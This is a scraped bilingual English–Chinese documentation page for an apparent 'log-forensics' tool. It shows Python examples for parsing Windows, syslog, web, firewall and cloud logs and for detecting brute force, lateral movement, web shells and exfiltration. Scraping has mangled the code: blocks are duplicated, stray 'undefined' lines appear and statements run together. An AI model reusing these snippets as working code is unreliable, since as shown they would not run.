log-forensics

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

Log Forensics

日志取证

Comprehensive log forensics skill for analyzing various log sources to reconstruct events, detect anomalies, and identify indicators of compromise. Enables correlation across multiple log sources, timeline creation, and automated anomaly detection.
一款全面的日志取证工具,可分析各类日志来源以还原事件、检测异常并识别入侵指标(IOC)。支持跨多个日志源的关联分析、时间线创建以及自动化异常检测。

Capabilities

功能特性

  • Windows Event Log Analysis: Parse and analyze EVTX files for security events
  • Syslog Analysis: Parse Unix/Linux syslog and rsyslog formats
  • Web Server Log Analysis: Analyze Apache, Nginx, IIS access and error logs
  • Application Log Analysis: Parse application-specific log formats
  • Log Correlation: Correlate events across multiple log sources
  • Timeline Generation: Create chronological event timelines
  • Anomaly Detection: Detect unusual patterns and outliers
  • Authentication Analysis: Track login attempts, failures, and lateral movement
  • IOC Extraction: Extract indicators of compromise from log entries
  • Statistical Analysis: Perform statistical analysis on log patterns
  • Windows事件日志分析:解析并分析EVTX文件中的安全事件
  • Syslog分析:解析Unix/Linux syslog和rsyslog格式
  • Web服务器日志分析:分析Apache、Nginx、IIS的访问日志和错误日志
  • 应用程序日志分析:解析特定应用程序的日志格式
  • 日志关联分析:跨多个日志源关联事件
  • 时间线生成:创建按时间顺序排列的事件时间线
  • 异常检测:检测异常模式和离群值
  • 认证分析:跟踪登录尝试、失败记录和横向移动
  • IOC提取:从日志条目中提取入侵指标
  • 统计分析:对日志模式进行统计分析

Quick Start

快速开始

python
from log_forensics import LogAnalyzer, EventLogParser, LogCorrelator
python
from log_forensics import LogAnalyzer, EventLogParser, LogCorrelator

Parse Windows Event Logs

Parse Windows Event Logs

parser = EventLogParser("/evidence/Security.evtx") events = parser.parse_all()
parser = EventLogParser("/evidence/Security.evtx") events = parser.parse_all()

Analyze authentication events

Analyze authentication events

auth_events = parser.get_authentication_events()
auth_events = parser.get_authentication_events()

Create log correlator

Create log correlator

correlator = LogCorrelator() correlator.add_source("windows", parser) correlator.add_source("firewall", FirewallLogParser("/evidence/firewall.log")) timeline = correlator.create_timeline()
undefined
correlator = LogCorrelator() correlator.add_source("windows", parser) correlator.add_source("firewall", FirewallLogParser("/evidence/firewall.log")) timeline = correlator.create_timeline()
undefined

Usage

使用方法

Task 1: Windows Event Log Analysis

任务1:Windows事件日志分析

Input: Windows EVTX log files
Process:
  1. Load and parse EVTX files
  2. Filter by event IDs of interest
  3. Extract relevant fields
  4. Identify security-relevant events
  5. Generate analysis report
Output: Parsed events with security analysis
Example:
python
from log_forensics import EventLogParser
输入:Windows EVTX日志文件
流程:
  1. 加载并解析EVTX文件
  2. 筛选感兴趣的事件ID
  3. 提取相关字段
  4. 识别与安全相关的事件
  5. 生成分析报告
输出:带有安全分析结果的解析后事件
示例:
python
from log_forensics import EventLogParser

Parse Security event log

Parse Security event log

parser = EventLogParser("/evidence/Security.evtx")
parser = EventLogParser("/evidence/Security.evtx")

Get all events

Get all events

events = parser.parse_all() print(f"Total events: {len(events)}")
events = parser.parse_all() print(f"Total events: {len(events)}")

Filter by event ID (4624 = successful login)

Filter by event ID (4624 = successful login)

logins = parser.filter_by_event_id([4624, 4625]) for login in logins: print(f"[{login.timestamp}] Event {login.event_id}") print(f" User: {login.get_field('TargetUserName')}") print(f" Domain: {login.get_field('TargetDomainName')}") print(f" Logon Type: {login.get_field('LogonType')}") print(f" Source IP: {login.get_field('IpAddress')}")
logins = parser.filter_by_event_id([4624, 4625]) for login in logins: print(f"[{login.timestamp}] Event {login.event_id}") print(f" User: {login.get_field('TargetUserName')}") print(f" Domain: {login.get_field('TargetDomainName')}") print(f" Logon Type: {login.get_field('LogonType')}") print(f" Source IP: {login.get_field('IpAddress')}")

Get authentication failures

Get authentication failures

failures = parser.get_failed_logins() for f in failures: print(f"Failed login: {f.username} from {f.source_ip}") print(f" Failure reason: {f.failure_reason}")
failures = parser.get_failed_logins() for f in failures: print(f"Failed login: {f.username} from {f.source_ip}") print(f" Failure reason: {f.failure_reason}")

Detect brute force attempts

Detect brute force attempts

brute_force = parser.detect_brute_force( threshold=10, time_window_minutes=5 ) for bf in brute_force: print(f"Brute force: {bf.target_account}") print(f" Attempts: {bf.attempt_count}") print(f" Source IPs: {bf.source_ips}")
brute_force = parser.detect_brute_force( threshold=10, time_window_minutes=5 ) for bf in brute_force: print(f"Brute force: {bf.target_account}") print(f" Attempts: {bf.attempt_count}") print(f" Source IPs: {bf.source_ips}")

Get process creation events (4688)

Get process creation events (4688)

processes = parser.get_process_creation_events() for p in processes: print(f"Process: {p.process_name}") print(f" Command line: {p.command_line}") print(f" Parent: {p.parent_process}")
processes = parser.get_process_creation_events() for p in processes: print(f"Process: {p.process_name}") print(f" Command line: {p.command_line}") print(f" Parent: {p.parent_process}")

Export to CSV

Export to CSV

parser.export_csv("/evidence/security_events.csv")
undefined
parser.export_csv("/evidence/security_events.csv")
undefined

Task 2: Security Event Detection

任务2:安全事件检测

Input: Windows Security Event Log
Process:
  1. Identify security-relevant event IDs
  2. Detect privilege escalation
  3. Identify lateral movement
  4. Detect persistence mechanisms
  5. Flag suspicious activities
Output: Security findings with severity ratings
Example:
python
from log_forensics import EventLogParser, SecurityDetector

parser = EventLogParser("/evidence/Security.evtx")
detector = SecurityDetector(parser)
输入:Windows安全事件日志
流程:
  1. 识别与安全相关的事件ID
  2. 检测权限提升行为
  3. 识别横向移动
  4. 检测持久化机制
  5. 标记可疑活动
输出:带有严重程度评级的安全发现
示例:
python
from log_forensics import EventLogParser, SecurityDetector

parser = EventLogParser("/evidence/Security.evtx")
detector = SecurityDetector(parser)

Detect privilege escalation

Detect privilege escalation

priv_esc = detector.detect_privilege_escalation() for pe in priv_esc: print(f"PRIV ESC: {pe.technique}") print(f" User: {pe.user}") print(f" Timestamp: {pe.timestamp}") print(f" Details: {pe.details}")
priv_esc = detector.detect_privilege_escalation() for pe in priv_esc: print(f"PRIV ESC: {pe.technique}") print(f" User: {pe.user}") print(f" Timestamp: {pe.timestamp}") print(f" Details: {pe.details}")

Detect lateral movement

Detect lateral movement

lateral = detector.detect_lateral_movement() for lm in lateral: print(f"Lateral Movement: {lm.source} -> {lm.destination}") print(f" Technique: {lm.technique}") print(f" Account: {lm.account}")
lateral = detector.detect_lateral_movement() for lm in lateral: print(f"Lateral Movement: {lm.source} -> {lm.destination}") print(f" Technique: {lm.technique}") print(f" Account: {lm.account}")

Detect account manipulation

Detect account manipulation

account_changes = detector.detect_account_changes() for ac in account_changes: print(f"Account Change: {ac.action}") print(f" Target: {ac.target_account}") print(f" By: {ac.actor}")
account_changes = detector.detect_account_changes() for ac in account_changes: print(f"Account Change: {ac.action}") print(f" Target: {ac.target_account}") print(f" By: {ac.actor}")

Detect service installations

Detect service installations

services = detector.detect_service_installations() for s in services: print(f"Service Installed: {s.service_name}") print(f" Path: {s.service_path}") print(f" Account: {s.service_account}")
services = detector.detect_service_installations() for s in services: print(f"Service Installed: {s.service_name}") print(f" Path: {s.service_path}") print(f" Account: {s.service_account}")

Detect scheduled tasks

Detect scheduled tasks

tasks = detector.detect_scheduled_tasks()
tasks = detector.detect_scheduled_tasks()

Detect log clearing

Detect log clearing

cleared = detector.detect_log_clearing() for c in cleared: print(f"LOG CLEARED: {c.log_name} at {c.timestamp}") print(f" By: {c.actor}")
cleared = detector.detect_log_clearing() for c in cleared: print(f"LOG CLEARED: {c.log_name} at {c.timestamp}") print(f" By: {c.actor}")

Generate security report

Generate security report

detector.generate_report("/evidence/security_findings.html")
undefined
detector.generate_report("/evidence/security_findings.html")
undefined

Task 3: Syslog Analysis

任务3:Syslog分析

Input: Unix/Linux syslog files
Process:
  1. Parse syslog format
  2. Categorize by facility and severity
  3. Identify authentication events
  4. Detect suspicious activities
  5. Create timeline
Output: Parsed syslog with analysis
Example:
python
from log_forensics import SyslogParser
输入:Unix/Linux syslog文件
流程:
  1. 解析Syslog格式
  2. 按工具类型和严重程度分类
  3. 识别认证事件
  4. 检测可疑活动
  5. 创建时间线
输出:带有分析结果的解析后Syslog
示例:
python
from log_forensics import SyslogParser

Parse syslog

Parse syslog

parser = SyslogParser("/evidence/messages")
parser = SyslogParser("/evidence/messages")

Get all entries

Get all entries

entries = parser.parse_all() print(f"Total entries: {len(entries)}")
entries = parser.parse_all() print(f"Total entries: {len(entries)}")

Filter by severity

Filter by severity

errors = parser.filter_by_severity(["error", "crit", "alert", "emerg"]) for e in errors: print(f"[{e.timestamp}] {e.facility}.{e.severity}: {e.message}")
errors = parser.filter_by_severity(["error", "crit", "alert", "emerg"]) for e in errors: print(f"[{e.timestamp}] {e.facility}.{e.severity}: {e.message}")

Get authentication events

Get authentication events

auth = parser.get_auth_events() for a in auth: print(f"[{a.timestamp}] {a.event_type}: {a.user}") print(f" Source: {a.source_ip}") print(f" Success: {a.success}")
auth = parser.get_auth_events() for a in auth: print(f"[{a.timestamp}] {a.event_type}: {a.user}") print(f" Source: {a.source_ip}") print(f" Success: {a.success}")

Detect SSH brute force

Detect SSH brute force

ssh_attacks = parser.detect_ssh_brute_force() for attack in ssh_attacks: print(f"SSH Attack from {attack.source_ip}") print(f" Attempts: {attack.count}") print(f" Users tried: {attack.users}")
ssh_attacks = parser.detect_ssh_brute_force() for attack in ssh_attacks: print(f"SSH Attack from {attack.source_ip}") print(f" Attempts: {attack.count}") print(f" Users tried: {attack.users}")

Analyze sudo usage

Analyze sudo usage

sudo = parser.get_sudo_events() for s in sudo: print(f"Sudo: {s.user} -> {s.run_as}") print(f" Command: {s.command}") print(f" Allowed: {s.allowed}")
sudo = parser.get_sudo_events() for s in sudo: print(f"Sudo: {s.user} -> {s.run_as}") print(f" Command: {s.command}") print(f" Allowed: {s.allowed}")

Get cron job executions

Get cron job executions

cron = parser.get_cron_events()
cron = parser.get_cron_events()

Export timeline

Export timeline

parser.export_timeline("/evidence/syslog_timeline.csv")
undefined
parser.export_timeline("/evidence/syslog_timeline.csv")
undefined

Task 4: Web Server Log Analysis

任务4:Web服务器日志分析

Input: Apache/Nginx/IIS access logs
Process:
  1. Parse access log format
  2. Identify unique visitors
  3. Detect attack patterns
  4. Find suspicious requests
  5. Generate access statistics
Output: Web access analysis with attack detection
Example:
python
from log_forensics import WebLogParser
输入:Apache/Nginx/IIS访问日志
流程:
  1. 解析访问日志格式
  2. 识别唯一访客
  3. 检测攻击模式
  4. 查找可疑请求
  5. 生成访问统计数据
输出:带有攻击检测结果的Web访问分析
示例:
python
from log_forensics import WebLogParser

Parse Apache access log

Parse Apache access log

parser = WebLogParser( "/evidence/access.log", log_format="apache_combined" )
parser = WebLogParser( "/evidence/access.log", log_format="apache_combined" )

Get all requests

Get all requests

requests = parser.parse_all() print(f"Total requests: {len(requests)}")
requests = parser.parse_all() print(f"Total requests: {len(requests)}")

Get unique visitors

Get unique visitors

visitors = parser.get_unique_visitors() print(f"Unique IPs: {len(visitors)}")
visitors = parser.get_unique_visitors() print(f"Unique IPs: {len(visitors)}")

Find suspicious requests

Find suspicious requests

suspicious = parser.find_suspicious_requests() for s in suspicious: print(f"SUSPICIOUS: {s.request}") print(f" IP: {s.client_ip}") print(f" Reason: {s.detection_reason}")
suspicious = parser.find_suspicious_requests() for s in suspicious: print(f"SUSPICIOUS: {s.request}") print(f" IP: {s.client_ip}") print(f" Reason: {s.detection_reason}")

Detect SQL injection attempts

Detect SQL injection attempts

sqli = parser.detect_sql_injection() for attack in sqli: print(f"SQLi: {attack.request}") print(f" Parameter: {attack.parameter}") print(f" IP: {attack.source_ip}")
sqli = parser.detect_sql_injection() for attack in sqli: print(f"SQLi: {attack.request}") print(f" Parameter: {attack.parameter}") print(f" IP: {attack.source_ip}")

Detect path traversal

Detect path traversal

traversal = parser.detect_path_traversal()
traversal = parser.detect_path_traversal()

Detect web shells

Detect web shells

webshells = parser.detect_webshell_access() for ws in webshells: print(f"Webshell: {ws.path}") print(f" IP: {ws.client_ip}") print(f" Commands: {ws.detected_commands}")
webshells = parser.detect_webshell_access() for ws in webshells: print(f"Webshell: {ws.path}") print(f" IP: {ws.client_ip}") print(f" Commands: {ws.detected_commands}")

Get response code distribution

Get response code distribution

codes = parser.get_status_code_distribution() print(f"200 OK: {codes.get(200, 0)}") print(f"404 Not Found: {codes.get(404, 0)}") print(f"500 Error: {codes.get(500, 0)}")
codes = parser.get_status_code_distribution() print(f"200 OK: {codes.get(200, 0)}") print(f"404 Not Found: {codes.get(404, 0)}") print(f"500 Error: {codes.get(500, 0)}")

Analyze by user agent

Analyze by user agent

user_agents = parser.analyze_user_agents() for ua in user_agents.suspicious: print(f"Suspicious UA: {ua.user_agent}") print(f" Reason: {ua.reason}")
user_agents = parser.analyze_user_agents() for ua in user_agents.suspicious: print(f"Suspicious UA: {ua.user_agent}") print(f" Reason: {ua.reason}")

Export to CSV

Export to CSV

parser.export_csv("/evidence/web_access.csv")
undefined
parser.export_csv("/evidence/web_access.csv")
undefined

Task 5: Log Correlation

任务5:日志关联分析

Input: Multiple log sources
Process:
  1. Normalize log formats
  2. Align timestamps
  3. Correlate related events
  4. Build unified timeline
  5. Identify attack chains
Output: Correlated timeline with attack sequences
Example:
python
from log_forensics import LogCorrelator, EventLogParser, SyslogParser, WebLogParser
输入:多个日志源
流程:
  1. 标准化日志格式
  2. 对齐时间戳
  3. 关联相关事件
  4. 构建统一时间线
  5. 识别攻击链
输出:带有攻击序列的关联时间线
示例:
python
from log_forensics import LogCorrelator, EventLogParser, SyslogParser, WebLogParser

Initialize correlator

Initialize correlator

correlator = LogCorrelator()
correlator = LogCorrelator()

Add log sources

Add log sources

correlator.add_source( "windows", EventLogParser("/evidence/Security.evtx") ) correlator.add_source( "linux", SyslogParser("/evidence/auth.log") ) correlator.add_source( "webserver", WebLogParser("/evidence/access.log") )
correlator.add_source( "windows", EventLogParser("/evidence/Security.evtx") ) correlator.add_source( "linux", SyslogParser("/evidence/auth.log") ) correlator.add_source( "webserver", WebLogParser("/evidence/access.log") )

Normalize timestamps to UTC

Normalize timestamps to UTC

correlator.normalize_timestamps(timezone="UTC")
correlator.normalize_timestamps(timezone="UTC")

Create unified timeline

Create unified timeline

timeline = correlator.create_timeline() for event in timeline: print(f"[{event.timestamp}] {event.source}: {event.summary}")
timeline = correlator.create_timeline() for event in timeline: print(f"[{event.timestamp}] {event.source}: {event.summary}")

Correlate by IP address

Correlate by IP address

ip_activity = correlator.correlate_by_ip("192.168.1.100") print(f"Activity from 192.168.1.100:") for event in ip_activity: print(f" [{event.source}] {event.summary}")
ip_activity = correlator.correlate_by_ip("192.168.1.100") print(f"Activity from 192.168.1.100:") for event in ip_activity: print(f" [{event.source}] {event.summary}")

Correlate by username

Correlate by username

user_activity = correlator.correlate_by_user("admin")
user_activity = correlator.correlate_by_user("admin")

Detect attack chains

Detect attack chains

chains = correlator.detect_attack_chains() for chain in chains: print(f"Attack Chain: {chain.name}") print(f" Confidence: {chain.confidence}") print(f" Events: {len(chain.events)}") for event in chain.events: print(f" - {event.timestamp}: {event.summary}")
chains = correlator.detect_attack_chains() for chain in chains: print(f"Attack Chain: {chain.name}") print(f" Confidence: {chain.confidence}") print(f" Events: {len(chain.events)}") for event in chain.events: print(f" - {event.timestamp}: {event.summary}")

Find temporal correlations

Find temporal correlations

correlations = correlator.find_temporal_correlations( time_window_seconds=60 )
correlations = correlator.find_temporal_correlations( time_window_seconds=60 )

Export correlated timeline

Export correlated timeline

correlator.export_timeline("/evidence/correlated_timeline.csv") correlator.export_timeline_html("/evidence/timeline.html")
undefined
correlator.export_timeline("/evidence/correlated_timeline.csv") correlator.export_timeline_html("/evidence/timeline.html")
undefined

Task 6: Authentication Analysis

任务6:认证分析

Input: Log files containing authentication events
Process:
  1. Extract all authentication events
  2. Analyze login patterns
  3. Detect anomalous logins
  4. Identify credential attacks
  5. Track session activity
Output: Authentication analysis report
Example:
python
from log_forensics import AuthenticationAnalyzer
输入:包含认证事件的日志文件
流程:
  1. 提取所有认证事件
  2. 分析登录模式
  3. 检测异常登录
  4. 识别凭证攻击
  5. 跟踪会话活动
输出:认证分析报告
示例:
python
from log_forensics import AuthenticationAnalyzer

Initialize with multiple sources

Initialize with multiple sources

analyzer = AuthenticationAnalyzer() analyzer.add_windows_logs("/evidence/Security.evtx") analyzer.add_linux_logs("/evidence/auth.log") analyzer.add_vpn_logs("/evidence/vpn.log")
analyzer = AuthenticationAnalyzer() analyzer.add_windows_logs("/evidence/Security.evtx") analyzer.add_linux_logs("/evidence/auth.log") analyzer.add_vpn_logs("/evidence/vpn.log")

Get all authentication events

Get all authentication events

auth_events = analyzer.get_all_events()
auth_events = analyzer.get_all_events()

Analyze login patterns per user

Analyze login patterns per user

patterns = analyzer.analyze_user_patterns("john.doe") print(f"User: john.doe") print(f" Usual login times: {patterns.usual_hours}") print(f" Usual locations: {patterns.usual_locations}") print(f" Failed attempts: {patterns.failed_count}")
patterns = analyzer.analyze_user_patterns("john.doe") print(f"User: john.doe") print(f" Usual login times: {patterns.usual_hours}") print(f" Usual locations: {patterns.usual_locations}") print(f" Failed attempts: {patterns.failed_count}")

Detect anomalous logins

Detect anomalous logins

anomalies = analyzer.detect_anomalies() for a in anomalies: print(f"ANOMALY: {a.user} at {a.timestamp}") print(f" Reason: {a.reason}") print(f" Details: {a.details}")
anomalies = analyzer.detect_anomalies() for a in anomalies: print(f"ANOMALY: {a.user} at {a.timestamp}") print(f" Reason: {a.reason}") print(f" Details: {a.details}")

Detect impossible travel

Detect impossible travel

travel = analyzer.detect_impossible_travel() for t in travel: print(f"Impossible Travel: {t.user}") print(f" Location 1: {t.location1} at {t.time1}") print(f" Location 2: {t.location2} at {t.time2}") print(f" Distance: {t.distance_km}km in {t.time_diff_minutes}min")
travel = analyzer.detect_impossible_travel() for t in travel: print(f"Impossible Travel: {t.user}") print(f" Location 1: {t.location1} at {t.time1}") print(f" Location 2: {t.location2} at {t.time2}") print(f" Distance: {t.distance_km}km in {t.time_diff_minutes}min")

Detect credential stuffing

Detect credential stuffing

stuffing = analyzer.detect_credential_stuffing()
stuffing = analyzer.detect_credential_stuffing()

Get failed login summary

Get failed login summary

failed = analyzer.get_failed_login_summary() print(f"Total failed logins: {failed.total}") print(f"Top targeted accounts: {failed.top_accounts}") print(f"Top source IPs: {failed.top_sources}")
failed = analyzer.get_failed_login_summary() print(f"Total failed logins: {failed.total}") print(f"Top targeted accounts: {failed.top_accounts}") print(f"Top source IPs: {failed.top_sources}")

Generate authentication report

Generate authentication report

analyzer.generate_report("/evidence/auth_analysis.html")
undefined
analyzer.generate_report("/evidence/auth_analysis.html")
undefined

Task 7: PowerShell and Command Line Analysis

任务7:PowerShell与命令行分析

Input: Windows Event Logs with PowerShell/command logging
Process:
  1. Extract PowerShell events (4103, 4104)
  2. Decode encoded commands
  3. Detect malicious patterns
  4. Identify obfuscation techniques
  5. Extract IOCs from commands
Output: Command analysis with threat indicators
Example:
python
from log_forensics import PowerShellAnalyzer
输入:包含PowerShell/命令行日志的Windows事件日志
流程:
  1. 提取PowerShell事件(4103、4104)
  2. 解码编码的命令
  3. 检测恶意模式
  4. 识别混淆技术
  5. 从命令中提取IOC
输出:带有威胁指标的命令分析结果
示例:
python
from log_forensics import PowerShellAnalyzer

Parse PowerShell logs

Parse PowerShell logs

analyzer = PowerShellAnalyzer() analyzer.add_event_log("/evidence/Microsoft-Windows-PowerShell%4Operational.evtx") analyzer.add_event_log("/evidence/Security.evtx")
analyzer = PowerShellAnalyzer() analyzer.add_event_log("/evidence/Microsoft-Windows-PowerShell%4Operational.evtx") analyzer.add_event_log("/evidence/Security.evtx")

Get all PowerShell events

Get all PowerShell events

events = analyzer.get_all_events()
events = analyzer.get_all_events()

Decode encoded commands

Decode encoded commands

decoded = analyzer.decode_encoded_commands() for d in decoded: print(f"Encoded command at {d.timestamp}:") print(f" Original: {d.encoded[:50]}...") print(f" Decoded: {d.decoded}")
decoded = analyzer.decode_encoded_commands() for d in decoded: print(f"Encoded command at {d.timestamp}:") print(f" Original: {d.encoded[:50]}...") print(f" Decoded: {d.decoded}")

Detect malicious patterns

Detect malicious patterns

malicious = analyzer.detect_malicious_patterns() for m in malicious: print(f"MALICIOUS: {m.pattern}") print(f" Command: {m.command}") print(f" Technique: {m.mitre_technique}")
malicious = analyzer.detect_malicious_patterns() for m in malicious: print(f"MALICIOUS: {m.pattern}") print(f" Command: {m.command}") print(f" Technique: {m.mitre_technique}")

Detect download cradles

Detect download cradles

cradles = analyzer.detect_download_cradles() for c in cradles: print(f"Download Cradle: {c.type}") print(f" URL: {c.url}") print(f" Command: {c.command}")
cradles = analyzer.detect_download_cradles() for c in cradles: print(f"Download Cradle: {c.type}") print(f" URL: {c.url}") print(f" Command: {c.command}")

Detect obfuscation

Detect obfuscation

obfuscated = analyzer.detect_obfuscation() for o in obfuscated: print(f"Obfuscation: {o.technique}") print(f" Score: {o.obfuscation_score}")
obfuscated = analyzer.detect_obfuscation() for o in obfuscated: print(f"Obfuscation: {o.technique}") print(f" Score: {o.obfuscation_score}")

Extract IOCs from commands

Extract IOCs from commands

iocs = analyzer.extract_iocs() print(f"URLs found: {len(iocs.urls)}") print(f"IPs found: {len(iocs.ips)}") print(f"Domains found: {len(iocs.domains)}") print(f"File paths: {len(iocs.file_paths)}")
iocs = analyzer.extract_iocs() print(f"URLs found: {len(iocs.urls)}") print(f"IPs found: {len(iocs.ips)}") print(f"Domains found: {len(iocs.domains)}") print(f"File paths: {len(iocs.file_paths)}")

Generate report

Generate report

analyzer.generate_report("/evidence/powershell_analysis.html")
undefined
analyzer.generate_report("/evidence/powershell_analysis.html")
undefined

Task 8: Firewall and Network Log Analysis

任务8:防火墙与网络日志分析

Input: Firewall logs (various formats)
Process:
  1. Parse firewall log format
  2. Analyze allowed/denied traffic
  3. Detect port scans
  4. Identify suspicious patterns
  5. Generate traffic statistics
Output: Firewall log analysis
Example:
python
from log_forensics import FirewallLogParser
输入:防火墙日志(多种格式)
流程:
  1. 解析防火墙日志格式
  2. 分析允许/拒绝的流量
  3. 检测端口扫描
  4. 识别可疑模式
  5. 生成流量统计数据
输出:防火墙日志分析结果
示例:
python
from log_forensics import FirewallLogParser

Parse firewall logs

Parse firewall logs

parser = FirewallLogParser( "/evidence/firewall.log", format="pfsense" # or "iptables", "windows_firewall", "cisco_asa" )
parser = FirewallLogParser( "/evidence/firewall.log", format="pfsense" # or "iptables", "windows_firewall", "cisco_asa" )

Get all events

Get all events

events = parser.parse_all()
events = parser.parse_all()

Get denied traffic

Get denied traffic

denied = parser.get_denied_traffic() for d in denied: print(f"DENIED: {d.src_ip}:{d.src_port} -> {d.dst_ip}:{d.dst_port}") print(f" Protocol: {d.protocol}") print(f" Rule: {d.rule_name}")
denied = parser.get_denied_traffic() for d in denied: print(f"DENIED: {d.src_ip}:{d.src_port} -> {d.dst_ip}:{d.dst_port}") print(f" Protocol: {d.protocol}") print(f" Rule: {d.rule_name}")

Detect port scans

Detect port scans

scans = parser.detect_port_scans() for s in scans: print(f"Port Scan: {s.source_ip}") print(f" Target: {s.target_ip}") print(f" Ports: {s.ports_scanned}") print(f" Type: {s.scan_type}")
scans = parser.detect_port_scans() for s in scans: print(f"Port Scan: {s.source_ip}") print(f" Target: {s.target_ip}") print(f" Ports: {s.ports_scanned}") print(f" Type: {s.scan_type}")

Detect potential C2

Detect potential C2

c2_indicators = parser.detect_c2_indicators() for c2 in c2_indicators: print(f"C2 Indicator: {c2.internal_ip} -> {c2.external_ip}") print(f" Pattern: {c2.pattern}")
c2_indicators = parser.detect_c2_indicators() for c2 in c2_indicators: print(f"C2 Indicator: {c2.internal_ip} -> {c2.external_ip}") print(f" Pattern: {c2.pattern}")

Get traffic summary

Get traffic summary

summary = parser.get_traffic_summary() print(f"Total connections: {summary.total}") print(f"Allowed: {summary.allowed}") print(f"Denied: {summary.denied}") print(f"Top talkers: {summary.top_sources}")
summary = parser.get_traffic_summary() print(f"Total connections: {summary.total}") print(f"Allowed: {summary.allowed}") print(f"Denied: {summary.denied}") print(f"Top talkers: {summary.top_sources}")

Analyze by destination port

Analyze by destination port

port_analysis = parser.analyze_by_port() for port, stats in port_analysis.items(): print(f"Port {port}: {stats.connection_count} connections")
port_analysis = parser.analyze_by_port() for port, stats in port_analysis.items(): print(f"Port {port}: {stats.connection_count} connections")

Export analysis

Export analysis

parser.export_csv("/evidence/firewall_events.csv")
undefined
parser.export_csv("/evidence/firewall_events.csv")
undefined

Task 9: Cloud Service Log Analysis

任务9:云服务日志分析

Input: Cloud platform logs (AWS, Azure, GCP)
Process:
  1. Parse cloud log format
  2. Identify management events
  3. Detect suspicious API calls
  4. Analyze IAM activities
  5. Check for data access
Output: Cloud activity analysis
Example:
python
from log_forensics import CloudLogAnalyzer
输入:云平台日志(AWS、Azure、GCP)
流程:
  1. 解析云日志格式
  2. 识别管理事件
  3. 检测可疑API调用
  4. 分析IAM活动
  5. 检查数据访问情况
输出:云活动分析结果
示例:
python
from log_forensics import CloudLogAnalyzer

AWS CloudTrail analysis

AWS CloudTrail analysis

aws_analyzer = CloudLogAnalyzer( "/evidence/cloudtrail/", platform="aws" )
aws_analyzer = CloudLogAnalyzer( "/evidence/cloudtrail/", platform="aws" )

Get all events

Get all events

events = aws_analyzer.parse_all()
events = aws_analyzer.parse_all()

Get IAM events

Get IAM events

iam_events = aws_analyzer.get_iam_events() for e in iam_events: print(f"[{e.timestamp}] {e.event_name}") print(f" User: {e.user_identity}") print(f" Source IP: {e.source_ip}")
iam_events = aws_analyzer.get_iam_events() for e in iam_events: print(f"[{e.timestamp}] {e.event_name}") print(f" User: {e.user_identity}") print(f" Source IP: {e.source_ip}")

Detect suspicious activities

Detect suspicious activities

suspicious = aws_analyzer.detect_suspicious_activities() for s in suspicious: print(f"SUSPICIOUS: {s.event_name}") print(f" Reason: {s.reason}") print(f" Risk: {s.risk_level}")
suspicious = aws_analyzer.detect_suspicious_activities() for s in suspicious: print(f"SUSPICIOUS: {s.event_name}") print(f" Reason: {s.reason}") print(f" Risk: {s.risk_level}")

Detect privilege escalation

Detect privilege escalation

priv_esc = aws_analyzer.detect_privilege_escalation()
priv_esc = aws_analyzer.detect_privilege_escalation()

Detect data exfiltration indicators

Detect data exfiltration indicators

exfil = aws_analyzer.detect_data_exfiltration() for e in exfil: print(f"Potential Exfil: {e.resource}") print(f" Action: {e.action}") print(f" By: {e.user}")
exfil = aws_analyzer.detect_data_exfiltration() for e in exfil: print(f"Potential Exfil: {e.resource}") print(f" Action: {e.action}") print(f" By: {e.user}")

Analyze S3 access

Analyze S3 access

s3_access = aws_analyzer.get_s3_access_events() for access in s3_access: print(f"S3: {access.action} on {access.bucket}") print(f" Object: {access.object_key}") print(f" User: {access.user}")
s3_access = aws_analyzer.get_s3_access_events() for access in s3_access: print(f"S3: {access.action} on {access.bucket}") print(f" Object: {access.object_key}") print(f" User: {access.user}")

Generate cloud security report

Generate cloud security report

aws_analyzer.generate_report("/evidence/cloud_analysis.html")
undefined
aws_analyzer.generate_report("/evidence/cloud_analysis.html")
undefined

Task 10: Log Anomaly Detection

任务10:日志异常检测

Input: Any log source
Process:
  1. Establish baseline patterns
  2. Apply statistical analysis
  3. Detect outliers
  4. Identify unusual sequences
  5. Flag anomalies
Output: Anomaly detection results
Example:
python
from log_forensics import AnomalyDetector
输入:任何日志源
流程:
  1. 建立基准模式
  2. 应用统计分析
  3. 检测离群值
  4. 识别异常序列
  5. 标记异常
输出:异常检测结果
示例:
python
from log_forensics import AnomalyDetector

Initialize detector

Initialize detector

detector = AnomalyDetector()
detector = AnomalyDetector()

Add log sources

Add log sources

detector.add_logs("/evidence/Security.evtx") detector.add_logs("/evidence/access.log") detector.add_logs("/evidence/auth.log")
detector.add_logs("/evidence/Security.evtx") detector.add_logs("/evidence/access.log") detector.add_logs("/evidence/auth.log")

Build baseline (using first portion of logs)

Build baseline (using first portion of logs)

detector.build_baseline(training_percentage=0.7)
detector.build_baseline(training_percentage=0.7)

Detect volume anomalies

Detect volume anomalies

volume_anomalies = detector.detect_volume_anomalies() for a in volume_anomalies: print(f"Volume Anomaly at {a.timestamp}") print(f" Expected: {a.expected_count}") print(f" Actual: {a.actual_count}") print(f" Deviation: {a.deviation}x")
volume_anomalies = detector.detect_volume_anomalies() for a in volume_anomalies: print(f"Volume Anomaly at {a.timestamp}") print(f" Expected: {a.expected_count}") print(f" Actual: {a.actual_count}") print(f" Deviation: {a.deviation}x")

Detect timing anomalies

Detect timing anomalies

timing_anomalies = detector.detect_timing_anomalies() for a in timing_anomalies: print(f"Timing Anomaly: {a.description}") print(f" Event: {a.event_type}") print(f" Usual time: {a.usual_time}") print(f" Occurred: {a.actual_time}")
timing_anomalies = detector.detect_timing_anomalies() for a in timing_anomalies: print(f"Timing Anomaly: {a.description}") print(f" Event: {a.event_type}") print(f" Usual time: {a.usual_time}") print(f" Occurred: {a.actual_time}")

Detect sequence anomalies

Detect sequence anomalies

sequence_anomalies = detector.detect_sequence_anomalies() for a in sequence_anomalies: print(f"Unusual Sequence: {a.sequence}") print(f" Probability: {a.probability}")
sequence_anomalies = detector.detect_sequence_anomalies() for a in sequence_anomalies: print(f"Unusual Sequence: {a.sequence}") print(f" Probability: {a.probability}")

Detect rare events

Detect rare events

rare_events = detector.find_rare_events(threshold=0.01) for e in rare_events: print(f"Rare Event: {e.event_type}") print(f" Frequency: {e.frequency}") print(f" Count: {e.count}")
rare_events = detector.find_rare_events(threshold=0.01) for e in rare_events: print(f"Rare Event: {e.event_type}") print(f" Frequency: {e.frequency}") print(f" Count: {e.count}")

Generate anomaly report

Generate anomaly report

detector.generate_report("/evidence/anomaly_report.html")
undefined
detector.generate_report("/evidence/anomaly_report.html")
undefined

Configuration

配置

Environment Variables

环境变量

VariableDescriptionRequiredDefault
